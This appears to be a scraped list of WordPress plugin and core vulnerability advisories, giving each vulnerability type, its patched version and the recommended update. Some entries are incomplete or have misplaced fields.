Vulnerability: Missing Authorization to Insecure Direct Object Reference
Patched Version: 5.1.3
Recommended Action: Update to version 5.1.3, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Missing Authorization & Cross-Site Request Forgery
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging

Vulnerability: Authorization Bypass
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: woocommerce-checkout-field-editor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Lazy Load for Videos

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.18.3
Recommended Action: Update to version 2.18.3, or a newer patched version

Plugin: Supra CSV

Vulnerability: Stored Cross-Site Scripting via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tapfiliate

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.13
Recommended Action: Update to version 3.0.13, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Missing Authorization to Arbitrary Group Option Modification and Privilege Escalation
Patched Version: 5.5.3
Recommended Action: Update to version 5.5.3, or a newer patched version

Plugin: WordPress Multisite Content Copier/Updater

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Widget Logic

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.10.2
Recommended Action: Update to version 5.10.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Information Disclosure and SMS Spam
Patched Version: 1.0.48
Recommended Action: Update to version 1.0.48, or a newer patched version

Plugin: WP Report Post

Plugin: Image Optimizer, Resizer and CDN – Sirv

Vulnerability: Missing Authorization via sirv_disconnect
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Redirect 404 Error Page to Homepage or Custom Page with Logs

Vulnerability: Log Deletion via Cross-Site Request Forgery
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Donorbox – Free Recurring Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.7
Recommended Action: Update to version 7.1.7, or a newer patched version

Plugin: Travel Management

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Better Click To Tweet

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.10.2
Recommended Action: Update to version 5.10.2, or a newer patched version

Plugin: Integrate Google Drive

Vulnerability: Missing Authorization via save_settings
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Subscriber+) Information Disclosure via Shortcode
Patched Version: 7.1.1
Recommended Action: Update to version 7.1.1, or a newer patched version

Plugin: Campaign Monitor for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.14
Recommended Action: Update to version 2.8.14, or a newer patched version

Plugin: Page Builder with Image Map by AZEXO

Vulnerability: Cross-Site Request Forgery to Post Creation/Modification/Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Webcam Microphone Screen Recorder HTML5

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Authenticated (Contributor+) Arbitrary File Upload
Patched Version: 12.1.11
Recommended Action: Update to version 12.1.11, or a newer patched version

Plugin: Steam Group Viewer

Plugin: How to Create an App for Android iPhone Easytouch

Plugin: CodeBard's Patron Button and Widgets for Patreon

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: PHP Execution

Plugin: Restaurant Reservations

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Easy Social Feed – Social Photos Gallery – Post Feed – Like Box

Vulnerability: Missing Authorization via hide_free_sidebar()
Patched Version: 6.5.2
Recommended Action: Update to version 6.5.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: HTML Injection
Patched Version: 3.0.31
Recommended Action: Update to version 3.0.31, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting via Comments
Patched Version: 3.7.29
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.29, 3.8.29, 3.9.27, 4.0.26, 4.1.26, 4.2.23, 4.3.19, 4.4.18, 4.5.17, 4.6.14, 4.7.13, 4.8.9, 4.9.10, 5.0.4, 5.1.1

Plugin: WP Mail Log

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Participants Database

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Kindeditor For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Image Slider by Ays- Responsive Slider and Carousel

Vulnerability: SQL Injection
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘clear_uucss_logs’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Video Conferencing with Zoom

Vulnerability: E-mail Address Disclosure
Patched Version: 3.8.17
Recommended Action: Update to version 3.8.17, or a newer patched version

Plugin: Design Approval System

Vulnerability: Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Missing Authorization to Sensitive Information Exposure via REST API
Patched Version: 2.2.51
Recommended Action: Update to version 2.2.51, or a newer patched version

Plugin: Export Users Data CSV

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Core: WordPress

Vulnerability: 6.3.1
Patched Version: 5.6.12
Recommended Action: Update to one of the following versions, or a newer patched version: 5.6.12, 5.7.10, 5.8.8, 5.9.8, 6.0.6, 6.1.4, 6.2.3, 6.3.2

Plugin: Search and Share

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.3.3
Recommended Action: Update to version 5.3.3, or a newer patched version

Plugin: Contact Form Advanced Database

Plugin: Community Events

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Customer Support Software, Live Chat, & Marketing Automation

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via ‘FormillaToolsID’
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Custom Contact Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1.0.3
Recommended Action: Update to version 5.1.0.3, or a newer patched version

Plugin: WooCommerce Bookings

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Subscribers Text Counter

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Shortcoder — Create Shortcodes for Anything

Vulnerability: Missing Authorization
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: Xllentech English Islamic Calendar

Vulnerability: SQL Injection
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: WPsoonOnlinePage

Plugin: OnionBuzz

Vulnerability: OnionBuzz < 1.2.2
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: Missing Authorization Checks
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 4.7.20
Recommended Action: Update to one of the following versions, or a newer patched version: 4.7.20, 4.8.16, 4.9.17, 5.0.12, 5.1.9, 5.2.10, 5.3.7, 5.4.5, 5.5.4, 5.6.3, 5.7.1

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Arbitrary File Upload
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Name Directory

Vulnerability: Unauthorized Settings Update
Patched Version: 1.25.5
Recommended Action: Update to version 1.25.5, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.35
Recommended Action: Update to version 3.35, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Open Redirect and Reflected Cross-Site Scripting
Patched Version: 4.4.11
Recommended Action: Update to version 4.4.11, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 2.7.11
Recommended Action: Update to version 2.7.11, or a newer patched version

Plugin: HTML2WP

Plugin: WP Google Review Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 11.6
Recommended Action: Update to version 11.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.22
Recommended Action: Update to version 3.2.22, or a newer patched version

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.0.28
Recommended Action: Update to version 2.0.28, or a newer patched version

Plugin: Custom Twitter Feeds – A Tweets Widget or X Feed Widget

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Share This Image

Vulnerability: Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.153
Recommended Action: Update to version 4.2.153, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery to PHP Object Injection
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: WP-FaceThumb

Vulnerability: Cross-Site Scripting
Patched Version: 0.2
Recommended Action: Update to version 0.2, or a newer patched version

Plugin: WP Custom Admin Interface

Vulnerability: Cross-Site Request Forgery to Transients Deletion
Patched Version: 7.33
Recommended Action: Update to version 7.33, or a newer patched version

Plugin: WordPress Bitcoin Payments – Blockonomics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: 有赏 You Shang

Core: WordPress MU

Vulnerability: SQL Injection
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: ApplyOnline – Application Form Builder and Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Stop Referrer Spam

Vulnerability: Cross-Site Request Forgery via processParameters
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: 3D Cover Carousel

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Arbitrary File Read/Deletion
Patched Version: 4.29.5
Recommended Action: Update to version 4.29.5, or a newer patched version

Plugin: GNUCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 0.5.7-beta
Recommended Action: Update to version 0.5.7-beta, or a newer patched version

Core: WordPress

Vulnerability: Restriction Bypass
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Answer My Question

Plugin: Short URL

Vulnerability: Authenticated(Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: WP Adminify – Custom WordPress Dashboard, Login and Admin Customizer

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Order Title Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.10, 2.1.2

Plugin: WP Affiliate Platform

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms

Vulnerability: Open Redirect via state parameter
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Knews Multilingual Newsletters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Add Link to Facebook

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.216
Recommended Action: Update to version 1.216, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Remote Code Execution
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Event Easy Calendar

Plugin: LeagueManager

Vulnerability: SQL Injection
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: WP Categories Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Music Player for WooCommerce

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.173
Recommended Action: Update to version 1.0.173, or a newer patched version

Plugin: Sucuri Security – Auditing, Malware Scanner and Security Hardening

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.34
Recommended Action: Update to version 1.8.34, or a newer patched version

Plugin: WPeMatico RSS Feed Fetcher

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.6.12
Recommended Action: Update to version 2.6.12, or a newer patched version

Plugin: WordPress RokBox

Vulnerability: Sensitive Data Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Grid Plus – Unlimited grid layout

Vulnerability: Authenticated (Subscriber+) Local File Inclusion via Shortcode
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Missing Authorization via submit
Patched Version: 3.4.1
Recommended Action: Update to version 3.4.1, or a newer patched version

Plugin: Responsive Poll

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Comment Fields [Modify/Disable/Remove]

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Semalt Blocker

Plugin: Nelio AB Testing

Vulnerability: Directory Traversal
Patched Version: 4.5.0
Recommended Action: Update to version 4.5.0, or a newer patched version

Plugin: Donorbox – Free Recurring Donation Plugin and Fundraising Platform

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: WPDBSpringClean

Plugin: URL Shortify – Simple, Powerful and Easy URL Shortener Plugin For WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2.71
Recommended Action: Update to version 3.2.71, or a newer patched version

Plugin: Storefront Footer Text

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Missing Authorization via send_test_email
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: SQL Injection
Patched Version: 7.11.18
Recommended Action: Update to version 7.11.18, or a newer patched version

Plugin: Maileon for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.16.1
Recommended Action: Update to version 2.16.1, or a newer patched version

Plugin: Themify Portfolio Post

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: PHP Object Injection
Patched Version: 3.1.6
Recommended Action: Update to version 3.1.6, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_bulk_deactivate_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: ALO EasyMail Newsletter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.7.0
Recommended Action: Update to version 2.7.0, or a newer patched version

Plugin: WordPress Sentinel

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Api2Cart Bridge Connector

Vulnerability: Arbitrary Code Execution
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: masterslider

Plugin: WP eBay Product Feeds

Vulnerability: Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Re:amaze Helpdesk & Live Chat

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Easy Testimonial Slider and Form

Vulnerability: Unauthenticated Reflected Cross-Site Scripting via search_term
Patched Version: 1.0.16
Recommended Action: Update to version 1.0.16, or a newer patched version

Plugin: Gravity Forms

Vulnerability: Arbitrary File Upload
Patched Version: 1.8.20
Recommended Action: Update to version 1.8.20, or a newer patched version

Plugin: Asgaros Forum

Vulnerability: SQL Injection
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: Giveaways and Contests by RafflePress – Get More Website Traffic, Email Subscribers, and Social Followers

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.12.2
Recommended Action: Update to version 1.12.2, or a newer patched version

Plugin: WooCommerce Blocks

Vulnerability: Authenticated Blind SQL Injection
Patched Version: 2.5.16
Recommended Action: Update to one of the following versions, or a newer patched version: 2.5.16, 2.6.2, 2.7.2, 2.8.1, 2.9.1, 3.0.1, 3.1.1, 3.2.1, 3.3.1, 3.4.1, 3.5.1, 3.6.1, 3.7.2, 3.8.1, 3.9.1, 4.0.1, 4.1.1, 4.2.1, 4.3.1, 4.4.3, 4.5.3, 4.6.1, 4.7.1, 4.8.1, 4.9.2, 5.0.1, 5.1.1, 5.2.1, 5.3.2, 5.4.1, 5.5.1

Plugin: Contact Form 7 Datepicker

Plugin: ImageMapper

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Theme Editor

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: WP Githuber MD – WordPress Markdown Editor

Vulnerability: Authenticated (Author+) Arbitrary File Upload
Patched Version: 1.16.3
Recommended Action: Update to version 1.16.3, or a newer patched version

Plugin: DMSGuestbook

Vulnerability: Directory Traversal
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Popup Like box – Page Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.3
Recommended Action: Update to version 3.5.3, or a newer patched version

Plugin: FooGallery – Responsive Photo Gallery, Image Viewer, Justified, Masonry & Carousel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.41
Recommended Action: Update to version 2.2.41, or a newer patched version

Plugin: InfiniteWP Client

Vulnerability: PHP Object Injection
Patched Version: 1.3.8
Recommended Action: Update to version 1.3.8, or a newer patched version

Plugin: Tiny Contact Form

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: Unauthenticated Sensitive Information Exposure
Patched Version: 1.0.65
Recommended Action: Update to version 1.0.65, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Stored Cross-Site Scripting
Patched Version: 8.2.0
Recommended Action: Update to version 8.2.0, or a newer patched version

Plugin: WooCommerce SagePay Direct Payment Gateway

Vulnerability: Cross-Site Scripting
Patched Version: 0.1.6.7
Recommended Action: Update to version 0.1.6.7, or a newer patched version

Plugin: Wholesale Suite – WooCommerce Wholesale Prices, B2B, Catalog Mode, Order Form, Wholesale User Roles, Dynamic Pricing & More

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.5.1
Recommended Action: Update to version 2.1.5.1, or a newer patched version

Plugin: WP Go Maps (formerly WP Google Maps)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 6.3.15
Recommended Action: Update to version 6.3.15, or a newer patched version

Plugin: Leaflet Maps Marker (Google Maps, OpenStreetMap, Bing Maps)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.12.7
Recommended Action: Update to version 3.12.7, or a newer patched version

Plugin: Slider by 10Web – Responsive Image Slider

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.2.52
Recommended Action: Update to version 1.2.52, or a newer patched version

Plugin: WDSocialWidgets

Plugin: Private Messages For WordPress

Plugin: Visual Portfolio, Photo Gallery & Post Grid

Vulnerability: Contributor+ CSS Injection
Patched Version: 2.19.0
Recommended Action: Update to version 2.19.0, or a newer patched version

Plugin: YOP Poll

Vulnerability: Reflected Cross-Site Scripting via poll_id Parameter
Patched Version: 6.0.3
Recommended Action: Update to version 6.0.3, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Authenticated SQL Injection
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Gallery PhotoBlocks

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.43
Recommended Action: Update to version 1.1.43, or a newer patched version

Plugin: AGIL(Automatic Grid Image Listing)

Plugin: Canto

Vulnerability: Unauthenticated Remote File Inclusion
Patched Version: 3.0.5
Recommended Action: Update to version 3.0.5, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Sensitive Data Exposure
Patched Version: 3.2.5
Recommended Action: Update to version 3.2.5, or a newer patched version

Plugin: FULL – Cliente

Vulnerability: Customer <= 2.2.3
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WP Survey And Quiz Tool

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: CPT Bootstrap Carousel

Plugin: Unlimited Addons for WPBakery Page Builder

Plugin: Crowdsignal Dashboard – Polls, Surveys & more

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: Broken Link Manager

Vulnerability: Cross-Site Scripting
Patched Version: 0.6.0
Recommended Action: Update to version 0.6.0, or a newer patched version

Plugin: Change Uploaded File Permissions

Vulnerability: Cross-Site Request Forgery to Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Audio Player with Playlist Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: SEO Booster

Vulnerability: Admin+ SQL Injection
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: Maps Plugin using Google Maps for WordPress – WP Google Map

Vulnerability: Arbitrary Post Deletion and Plugin Settings Update via Cross-Site Request Forgery
Patched Version: 1.8.4
Recommended Action: Update to version 1.8.4, or a newer patched version

Plugin: LWS Affiliation

Vulnerability: Unauthenticated Remote/Local File Inclusion
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: Authenticated(Administrator+) SQL Injection via ‘replace_urls’
Patched Version: 3.12.2
Recommended Action: Update to version 3.12.2, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘loadRedirectSettings’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Newsletter & Bulk Email Sender – Email Newsletter Plugin for WordPress

Plugin: Citizen Space

Plugin: WP Recipe Maker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via ‘tag’
Patched Version: 9.1.1
Recommended Action: Update to version 9.1.1, or a newer patched version

Plugin: Participants Database

Vulnerability: Cross-Site Request Forgery via _process_general
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Missing Authorization
Patched Version: 3.9.5
Recommended Action: Update to version 3.9.5, or a newer patched version

Plugin: Easy Forms for Mailchimp

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 6.6.3
Recommended Action: Update to version 6.6.3, or a newer patched version

Plugin: Forms for Mailchimp by Optin Cat – Grow Your MailChimp List

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting
Patched Version: 2.5.5
Recommended Action: Update to version 2.5.5, or a newer patched version

Plugin: Quick Restaurant Reservations

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.2
Recommended Action: Update to version 1.4.2, or a newer patched version

Plugin: Simple Slider

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery via Multiple Functions
Patched Version: 1.1.3.2
Recommended Action: Update to version 1.1.3.2, or a newer patched version

Plugin: Easily Generate Rest API Url

Core: WordPress

Vulnerability: Bypass sanitize_file_name Protection
Patched Version: 3.7.15
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.15, 3.8.15, 3.9.13, 4.0.12, 4.1.12, 4.2.9, 4.3.5, 4.4.4, 4.5.3

Plugin: Our Team Showcase

Vulnerability: Cross-Site Scripting
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Redirection

Vulnerability: Missing Authorization in ‘liveSearch’ function
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WP Prayer

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 1.6.6
Recommended Action: Update to version 1.6.6, or a newer patched version

Plugin: Instantio – WooCommerce Quick Checkout | Direct Checkout, Floating Cart, Side Cart & Popup Cart

Vulnerability: Cross Site Request Forgery
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: Online Hotel Booking System Pro

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Unauthenticated CSV Injection
Patched Version: 5.5.3
Recommended Action: Update to version 5.5.3, or a newer patched version

Plugin: Fancy Product Designer

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.5.1
Recommended Action: Update to version 4.5.1, or a newer patched version

Plugin: TubePress

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: WP Mail SMTP Pro

Vulnerability: Missing Authorization to Information Dislcosure via is_print_page
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Survey Maker

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: Maintenance Switch

Plugin: YourChannel: Everything you want in a YouTube plugin.

